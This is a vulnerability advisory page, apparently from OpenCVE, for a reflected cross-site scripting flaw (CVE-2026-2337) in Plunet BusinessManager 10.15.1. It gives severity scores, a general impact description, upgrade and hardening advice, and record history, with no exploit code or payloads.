Description
A vulnerability in Plunet Plunet BusinessManager allows session hijacking, data theft, unauthorized actions on behalf of the user.This issue affects Plunet BusinessManager: 10.15.1.
Published: 2026-02-11
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting leading to session hijacking and data theft
Action: Patch
AI Analysis

Impact

A cross‑site scripting flaw exists in Plunet BusinessManager, allowing attackers to inject malicious scripts into the web interface. The vulnerability can result in theft of session cookies, sensitive data, and execution of unauthorized actions on behalf of the user. This is an input validation failure (CWE‑79).

Affected Systems

Plunet BusinessManager, distributed by Plunet, is affected. The flaw resides in version 10.15.1; versions starting with 10.22.3 contain a fix and are no longer vulnerable.

Risk and Exploitability

The CVSS score of 8.7 classifies the issue as high severity. The EPSS score is under 1 %, indicating a very low current exploitation probability, and it is not listed in CISA’s KEV catalog. The likely attack vector is inferred to be web‑based, requiring the attacker to deliver malicious payloads through user‑supplied input that the application fails to sanitize. If a victim visits a crafted page, the attacker could hijack the session and perform actions with the victim’s authority. While no public exploit is documented, the high severity and potential for automated attacks warrant swift remediation.

Generated by OpenCVE AI on April 17, 2026 at 20:21 UTC.

Remediation

Vendor Solution

Upgrade Plunet BusinessManager to version 10.22.3 or later, which includes a fix for the identified cross-site scripting vulnerabilities.

OpenCVE Recommended Actions

  • Upgrade Plunet BusinessManager to version 10.22.3 or later.
  • Apply input filtering or encoding on all fields that accept user data to neutralize script payloads.
  • Deploy a web application firewall or configure browser security headers (e.g., X‑XSS‑Protection, Content‑Security‑Policy) to mitigate remaining XSS risks.

Generated by OpenCVE AI on April 17, 2026 at 20:21 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 11 Feb 2026 22:15:00 +0000

Type Values Removed Values Added
First Time appeared Plunet
Plunet business Manager
Vendors & Products Plunet
Plunet business Manager

Wed, 11 Feb 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 11 Feb 2026 14:00:00 +0000

Type Values Removed Values Added
Description A vulnerability in Plunet Plunet BusinessManager allows session hijacking, data theft, unauthorized actions on behalf of the user.This issue affects Plunet BusinessManager: 10.15.1.
Title Refleccted XSS on Plunet BusinessManager
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N'}

Subscriptions

Plunet Business Manager
cve-icon MITRE

Status: PUBLISHED

Assigner: TCS-CERT

Published:

Updated: 2026-02-19T08:59:12.567Z

Reserved: 2026-02-11T10:58:48.725Z

Link: CVE-2026-2337

cve-icon Vulnrichment

Updated: 2026-02-11T14:19:25.479Z

cve-icon NVD

Status : Deferred

Published: 2026-02-11T14:16:02.390

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-2337

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T20:30:15Z

Weaknesses